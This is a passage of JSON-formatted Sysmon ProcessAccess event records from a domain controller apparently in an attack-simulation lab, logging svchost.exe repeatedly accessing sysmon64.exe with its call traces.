06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1946,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1947,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1948,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1949,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1950,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1951,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1952,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1953,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
